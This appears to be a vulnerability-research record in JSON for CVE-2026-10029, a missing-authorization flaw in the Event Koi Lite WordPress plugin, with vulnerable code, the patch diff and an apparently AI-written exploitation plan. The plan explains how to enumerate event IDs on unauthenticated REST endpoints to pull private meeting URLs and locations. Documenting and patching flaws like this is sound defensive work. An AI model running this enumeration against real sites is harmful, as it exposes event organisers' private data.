[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$foAN4r0mVh4y0aEHciNEj8_-bAHmN8-zOK5Fsqr8DxIw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-10029","event-koi-lite-missing-authorization-to-unauthenticated-sensitive-information-exposure-via-rest-api-endpoints","Event Koi Lite \u003C= 1.3.13.1 - Missing Authorization to Unauthenticated Sensitive Information Exposure via REST API Endpoints","The Event Koi Lite – Events Calendar, Event Management, RSVP, and Tickets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.13.1 via the get_events. This makes it possible for unauthenticated attackers to extract sensitive data including virtual meeting URLs, physical location data, latitude\u002Flongitude coordinates, Google Maps links, and RSVP configuration belonging to draft, pending, and private events that are otherwise inaccessible via public URLs.","eventkoi-lite",null,"\u003C=1.3.13.1","1.3.14.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Missing Authorization","2026-06-17 16:08:57","2026-06-18 04:31:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb1be4b6c-ce48-49a2-8d2c-89c9611c8750?source=api-prod",1,[22,23,24,25,26,27,28,29],"eventkoi.php","includes\u002Fadmin\u002Fclass-scripts.php","includes\u002Fapi\u002Fclass-event.php","includes\u002Fcore\u002Fclass-event.php","includes\u002Fcore\u002Fclass-events.php","includes\u002Fcore\u002Fclass-template.php","readme.txt","scripts\u002Fbackend\u002Fbuild\u002Findex.asset.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-10029 (Event Koi Lite)\n\n## 1. Vulnerability Summary\nThe **Event Koi Lite** plugin (versions \u003C= 1.3.13.1) contains a **Missing Authorization** vulnerability within its REST API implementation. Specifically, the endpoints `\u002Fevent` and `\u002Fget_event` are registered with a `permission_callback` of `__return_true`, making them accessible to unauthenticated users. These endpoints retrieve event data by ID using `get_post()`, which retrieves the post object regardless of its status (draft, pending, or private). Because the plugin fails to verify the post status or the user's capability to read non-public posts, it exposes sensitive event metadata—including virtual meeting URLs and physical locations—that should be restricted.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fevent` (and `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fget_event`)\n*   **Method:** `GET`\n*   **Vulnerable Parameter:** `id` (integer)\n*   **Authentication:** None (Unauthenticated)\n*   **Preconditions:** An event of the custom post type `eventkoi_event` must exist with a non-public status (e.g., `draft`, `private`, `pending`).\n\n## 3. Code Flow\n1.  **Registration:** In `includes\u002Fapi\u002Fclass-event.php`, the `init()` method registers the REST routes:\n    ```php\n    register_rest_route(\n        EVENTKOI_API, \u002F\u002F 'eventkoi\u002Fv1'\n        '\u002Fevent',\n        array(\n            'methods'             => 'GET',\n            'callback'            => array( self::class, 'get_result' ),\n            'permission_callback' => '__return_true', \u002F\u002F \u003C--- VULNERABILITY: No authorization check\n        )\n    );\n    ```\n2.  **Retrieval:** The `get_result(WP_REST_Request $request)` method extracts the `id` parameter:\n    ```php\n    $event_id = absint( $request->get_param( 'id' ) );\n    $event    = new SingleEvent( $event_id );\n    $response = $event::get_meta();\n    ```\n3.  **Instantiation:** The `EventKoi\\Core\\Event` (`SingleEvent`) constructor in `includes\u002Fcore\u002Fclass-event.php` uses `get_post($event)`:\n    ```php\n    public function __construct( $event = null ) {\n        if ( is_numeric( $event ) ) {\n            $event = get_post( $event ); \u002F\u002F \u003C--- Fetches the post regardless of status\n            \u002F\u002F ...\n        }\n        self::$event    = $event;\n        self::$event_id = ! empty( $event->ID ) ? $event->ID : 0;\n    }\n    ```\n4.  **Exposure:** `SingleEvent::get_meta()` iterates through `$meta_keys` (defined in `class-event.php`), which includes sensitive keys like `virtual_url`, `location`, `latitude`, `longitude`, `gmap_link`, and `rsvp_enabled`. It returns these values to the API response.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. \n*   The `permission_callback` is explicitly set to `__return_true`.\n*   Standard WordPress REST API requests usually require a `_wpnonce` for authenticated state changes (POST\u002FPUT\u002FDELETE), but for `GET` requests with `__return_true`, no nonce is validated by the REST server.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated user can read sensitive data from a `draft` event.\n\n1.  **Enumerate IDs:** An attacker would typically iterate through potential post IDs (e.g., 1 to 2000).\n2.  **Request Event Data:** Send a `GET` request to the vulnerable endpoint for each ID.\n3.  **Identify Sensitive Data:** Parse the JSON response for sensitive fields.\n\n### Actionable Request\nUsing the `http_request` tool:\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fevent?id=\u003CEVENT_ID>`\n*   **Method:** `GET`\n*   **Headers:** `Content-Type: application\u002Fjson`\n\n## 6. Test Data Setup\nTo verify the vulnerability in a controlled environment:\n1.  **Create a Draft Event:** Use WP-CLI to create an event with sensitive information that is *not* published.\n    ```bash\n    # Create the event\n    EVENT_ID=$(wp post create --post_type=eventkoi_event --post_status=draft --post_title=\"Secret Board Meeting\" --porcelain)\n    \n    # Add sensitive metadata\n    wp post meta set $EVENT_ID virtual_url \"https:\u002F\u002Fzoom.us\u002Fj\u002F999888777666\"\n    wp post meta set $EVENT_ID location \"Secret Underground Bunker\"\n    wp post meta set $EVENT_ID latitude \"37.2431\"\n    wp post meta set $EVENT_ID longitude \"-115.793\"\n    ```\n2.  **Verify Status:** Ensure the post is in `draft` status (`wp post get $EVENT_ID --field=post_status`).\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body containing the sensitive fields:\n```json\n{\n    \"id\": 123,\n    \"title\": \"Secret Board Meeting\",\n    \"virtual_url\": \"https:\u002F\u002Fzoom.us\u002Fj\u002F999888777666\",\n    \"location\": \"Secret Underground Bunker\",\n    \"latitude\": \"37.2431\",\n    \"longitude\": \"-115.793\",\n    \"wp_status\": \"draft\"\n}\n```\nAn unauthenticated request should normally result in a `401 Unauthorized` or `404 Not Found` (to prevent ID enumeration) for non-public content.\n\n## 8. Verification Steps\n1.  **Confirm Unauthenticated Access:** Verify that the request was made without any `Cookie` or `Authorization` headers.\n2.  **Check Sensitivity:** Use WP-CLI to confirm the retrieved data matches the `draft` event's meta:\n    ```bash\n    wp post meta get \u003CEVENT_ID> virtual_url\n    ```\n3.  **Status Check:** Confirm the event is indeed a draft and not publicly accessible via the standard frontend URL (`wp post get \u003CEVENT_ID> --field=guid`).\n\n## 9. Alternative Approaches\nIf the `\u002Fevent` endpoint is patched or behaves differently, test the secondary endpoint:\n*   **Endpoint:** `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fget_event?id=\u003CID>`\n*   **Logic:** This calls `eventkoi_get_event($event_id)`, which likely uses similar internal logic via `SingleEvent`.\n\nIf the plugin implements a collection endpoint (referred to as `get_events` in the description but not present in the snippets), try:\n*   **Endpoint:** `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fevents` (inferred)\n*   **Logic:** This would likely leak multiple non-public events in a single response, significantly increasing the impact.","The Event Koi Lite plugin for WordPress is vulnerable to sensitive information exposure via its REST API due to missing authorization checks on several endpoints. Unauthenticated attackers can exploit this to retrieve sensitive metadata—including virtual meeting URLs, precise physical coordinates, and RSVP settings—belonging to non-public event statuses such as drafts, private, and pending posts.","\u002F\u002F includes\u002Fapi\u002Fclass-event.php\n\tpublic static function init() {\n\t\tregister_rest_route(\n\t\t\tEVENTKOI_API,\n\t\t\t'\u002Fevent',\n\t\t\tarray(\n\t\t\t\t'methods'             => 'GET',\n\t\t\t\t'callback'            => array( self::class, 'get_result' ),\n\t\t\t\t'permission_callback' => '__return_true',\n\t\t\t)\n\t\t);\n\n\t\tregister_rest_route(\n\t\t\tEVENTKOI_API,\n\t\t\t'\u002Fget_event',\n\t\t\tarray(\n\t\t\t\t'methods'             => 'GET',\n\t\t\t\t'callback'            => array( self::class, 'get_event' ),\n\t\t\t\t'permission_callback' => '__return_true',\n\t\t\t)\n\t\t);\n---\n\u002F\u002F includes\u002Fapi\u002Fclass-event.php\n\tpublic static function get_result( WP_REST_Request $request ) {\n\t\t$event_id = absint( $request->get_param( 'id' ) );\n\n\t\tif ( empty( $event_id ) ) {\n\t\t\treturn new WP_Error( 'eventkoi_invalid_id', __( 'Invalid event ID.', 'eventkoi-lite' ), array( 'status' => 400 ) );\n\t\t}\n\n\t\t$event    = new SingleEvent( $event_id );\n\t\t$response = $event::get_meta();\n\t\t$response = self::attach_rendered_event_fields( $response, $event_id );\n\n\t\treturn rest_ensure_response( $response );\n\t}\n---\n\u002F\u002F includes\u002Fcore\u002Fclass-event.php\n\tpublic function __construct( $event = null ) {\n\n\t\tif ( is_numeric( $event ) ) {\n\t\t\t$event = get_post( $event );\n\t\t\tif ( ! empty( $event->post_type ) && 'eventkoi_event' !== $event->post_type ) {\n\t\t\t\t$event = array();\n\t\t\t}\n\t\t}\n\n\t\tself::$event    = $event;\n\t\tself::$event_id = ! empty( $event->ID ) ? $event->ID : 0;\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Feventkoi-lite\u002F1.3.13.1\u002Fincludes\u002Fapi\u002Fclass-event.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Feventkoi-lite\u002F1.3.14.0\u002Fincludes\u002Fapi\u002Fclass-event.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Feventkoi-lite\u002F1.3.13.1\u002Fincludes\u002Fapi\u002Fclass-event.php\t2026-05-21 20:42:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Feventkoi-lite\u002F1.3.14.0\u002Fincludes\u002Fapi\u002Fclass-event.php\t2026-06-04 18:20:14.000000000 +0000\n@@ -147,6 +147,17 @@\n \t\t\treturn new WP_Error( 'eventkoi_invalid_id', __( 'Invalid event ID.', 'eventkoi-lite' ), array( 'status' => 400 ) );\n \t\t}\n \n+\t\t\u002F\u002F Non-published events (draft, pending, future, private) are only\n+\t\t\u002F\u002F readable by users who can edit them. This prevents unauthenticated\n+\t\t\u002F\u002F disclosure of unpublished event data (CVE-2026-10029).\n+\t\t$post = get_post( $event_id );\n+\t\tif ( ! $post || 'eventkoi_event' !== $post->post_type ) {\n+\t\t\treturn new WP_Error( 'eventkoi_not_found', __( 'Event not found.', 'eventkoi-lite' ), array( 'status' => 404 ) );\n+\t\t}\n+\t\tif ( 'publish' !== $post->post_status && ! current_user_can( 'edit_post', $event_id ) ) {\n+\t\t\treturn new WP_Error( 'eventkoi_not_found', __( 'Event not found.', 'eventkoi-lite' ), array( 'status' => 404 ) );\n+\t\t}\n+\n \t\t$event    = new SingleEvent( $event_id );\n \t\t$response = $event::get_meta();\n \t\t$response = self::attach_rendered_event_fields( $response, $event_id );\n@@ -364,6 +375,15 @@\n \t\t\treturn new \\WP_Error( 'eventkoi_missing_param', __( 'Missing event ID or timestamp.', 'eventkoi-lite' ) );\n \t\t}\n \n+\t\t\u002F\u002F Gate unpublished instance data behind edit capability (CVE-2026-10029).\n+\t\t$post = get_post( $event_id );\n+\t\tif ( ! $post || 'eventkoi_event' !== $post->post_type ) {\n+\t\t\treturn new \\WP_Error( 'eventkoi_not_found', __( 'Event not found.', 'eventkoi-lite' ), array( 'status' => 404 ) );\n+\t\t}\n+\t\tif ( 'publish' !== $post->post_status && ! current_user_can( 'edit_post', $event_id ) ) {\n+\t\t\treturn new \\WP_Error( 'eventkoi_not_found', __( 'Event not found.', 'eventkoi-lite' ), array( 'status' => 404 ) );\n+\t\t}\n+\n \t\t$event = new \\EventKoi\\Core\\Event( $event_id );\n \t\t$raw   = $event::get_meta();","The exploit targets the `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fevent` and `\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fget_event` endpoints, which are configured with `permission_callback` set to `__return_true`. \n\n1. An unauthenticated attacker identifies the REST API endpoint base: `https:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Feventkoi\u002Fv1\u002Fevent`.\n2. The attacker performs an ID enumeration attack by iterating through integer values for the `id` parameter (e.g., `?id=1`, `?id=2`, etc.).\n3. Because the internal logic uses `get_post()` without verifying the post status, the API returns a full metadata object for any event ID, regardless of whether it is public (`publish`) or restricted (`draft`, `pending`, `private`).\n4. The resulting JSON response exposes sensitive fields such as `virtual_url` (meeting links), `location`, `latitude`, `longitude`, and `rsvp_enabled` status for internal or unpublished events.","gemini-3-flash-preview","2026-06-25 22:03:22","2026-06-25 22:04:14",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.3.13.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventkoi-lite\u002Ftags\u002F1.3.13.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventkoi-lite.1.3.13.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventkoi-lite\u002Ftags\u002F1.3.14.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventkoi-lite.1.3.14.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventkoi-lite\u002Ftags"]